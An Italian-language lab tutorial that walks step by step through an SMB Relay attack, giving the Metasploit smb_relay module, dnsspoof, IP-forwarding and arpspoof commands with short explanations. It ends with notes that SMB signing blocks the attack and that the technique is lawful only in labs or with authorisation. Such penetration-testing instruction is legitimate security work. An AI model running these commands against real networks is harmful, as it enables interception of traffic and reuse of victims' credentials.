Msfconsole
Guida Approfondita all'SMB Relay Attack con Metasploit Il seguente documento descrive passo dopo passo un attacco SMB Relay, evidenziando i comandi utilizzati nel contesto di un laboratorio e spiegand
Guida Approfondita all'SMB Relay Attack con Metasploit
Il seguente documento descrive passo dopo passo un attacco SMB Relay, evidenziando i comandi utilizzati nel contesto di un laboratorio e spiegando ogni fase dell'attacco in dettaglio.
1. Cos'è un SMB Relay Attack?
Un SMB Relay Attack sfrutta la mancanza di firma nei pacchetti SMB per intercettare e inoltrare le credenziali tra due host. L'attaccante si pone tra una vittima e un server, inoltrando le richieste SMB in modo da autenticarsi sul server di destinazione con le credenziali della vittima.
2. Preparazione dell'ambiente con Metasploit
Comando:
msfconsole
use exploit/windows/smb/smb_relaySpiegazione:
- Si avvia Metasploit.
- Si seleziona il modulo
exploit/windows/smb/smb_relayche consente di inoltrare le richieste SMB intercettate.
3. Manipolazione del DNS (DNS Spoofing)
Comando:
echo "172.16.5.101 *.sportsfoo.com" > dnsSpiegazione:
- Viene creato un file chiamato
dnsche forza qualsiasi sottodominio disportsfoo.coma risolvere l'indirizzo IP172.16.5.101, ovvero quello dell'attaccante.
Comando:
dnsspoof -i eth1 -f dnsSpiegazione:
- Si utilizza
dnsspoofper rispondere alle richieste DNS sulla scheda di reteeth1con l'IP fittizio specificato nel filedns.
4. Abilitazione dell'IP forwarding
Comando:
echo 1 > /proc/sys/net/ipv4/ip_forwardSpiegazione:
- Permette al sistema attaccante di inoltrare pacchetti tra le due interfacce di rete, comportamento necessario per effettuare un attacco "man-in-the-middle".
5. Avvio dell'ARP Spoofing
Comandi:
arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
arpspoof -i eth1 -t 172.16.5.1 172.16.5.5Spiegazione:
- Questi due comandi convincono il client (172.16.5.5) e il gateway (172.16.5.1) che l'attaccante è l'altro interlocutore.
- Il risultato è che tutto il traffico tra questi due host passa attraverso l'attaccante, che può intercettare le richieste SMB.
6. Conclusione dell'attacco
A questo punto, il modulo smb_relay di Metasploit dovrebbe essere pronto a ricevere una connessione SMB dalla vittima, inoltrarla al server e autenticarsi con le credenziali della vittima. Questo può consentire l'accesso remoto o l'esecuzione di comandi sul server di destinazione, a seconda della configurazione e delle vulnerabilità presenti.
Nota Bene: Questo tipo di attacco funziona solo se SMB Signing non è abilitato sul server. L'uso di tale tecnica è lecito solo in contesti di laboratorio o con autorizzazione esplicita per test di sicurezza.